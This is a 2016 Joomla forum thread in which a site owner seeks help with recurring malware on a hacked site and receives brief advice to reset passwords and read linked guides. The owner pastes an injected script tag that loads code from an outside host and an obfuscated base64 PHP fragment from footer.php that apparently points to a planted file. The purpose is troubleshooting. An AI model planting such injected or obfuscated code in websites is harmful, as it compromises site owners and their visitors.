How to rescue a hacked Joomla 3.4.8 site

Discussion regarding Joomla! 3.x security issues.

Moderators: Bernard T, mandville, fcoulter, PhilD, General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Forum Post Assistant / FPA - If you are serious about wanting help, you will use this tool to help you post.
Locked
User avatar
popoguy
Joomla! Apprentice
Joomla! Apprentice
Posts: 35
Joined: Mon Feb 18, 2008 4:05 pm
Contact:

How to rescue a hacked Joomla 3.4.8 site

Post by popoguy » Thu Feb 04, 2016 8:36 am

The website was hacked 2 months after I upgraded it to J! 3.4.3
All the malware codes were removed at that time and the site was upgraded to J! 3.4.8 later.
31st Jan 2016, the same malware codes were found in template folder again. And this code (see below) takes 20seconds to load at frontend, seriously drag the website down.

Every page at frond end

Code: Select all

<!--
var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="//www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})()
//-->
Template footer.php at back end

Code: Select all

<? function v($i){$a=Array('' .'RE9DVU1FT' 
.'l' .'Rf' .'Uk9PVA==','L' .'2xpYn' .'Jhcmll' .'cy9qb29tbGE' 
.'vZ3JpZ' .'C9p' .'bmRl' .'eC5waH' .'A=');
return base64_decode($a[$i]);} ?>
I removed the code from the back end on the same day I found it, and 4th Feb 2016 the codes show up again.

Is there anyway to prevent this happen again?

User avatar
sudo-web
Joomla! Ace
Joomla! Ace
Posts: 1325
Joined: Fri Jan 22, 2016 7:10 pm
Location: Vienna - Austria
Contact:

Re: How to rescue a hacked Joomla 3.4.8 site

Post by sudo-web » Thu Feb 04, 2016 9:21 am

If your site were hacked(and this seems to be a fact), than you should take proper action, like reseting all passwords. Please refer to this http://forum.joomla.org/viewtopic.php?f=714&t=757645
Visit me on my Webdesign Webpage: https://www.posit.at

User avatar
popoguy
Joomla! Apprentice
Joomla! Apprentice
Posts: 35
Joined: Mon Feb 18, 2008 4:05 pm
Contact:

Re: How to rescue a hacked Joomla 3.4.8 site

Post by popoguy » Tue Feb 16, 2016 9:14 am

3 days after I corrected the footer.php file, the malware codes shows up again, even the modify time is the same as I corrected the file.
This can indicate problem, or not?
Any suggestion?

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 37142
Joined: Sat Apr 05, 2008 9:58 pm

Re: How to rescue a hacked Joomla 3.4.8 site

Post by Webdongle » Tue Feb 16, 2016 10:03 am

http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"The definition of insanity is doing the same thing over and over again, but expecting different results": Albert Einstein


Locked

Return to “Security in Joomla! 3.x”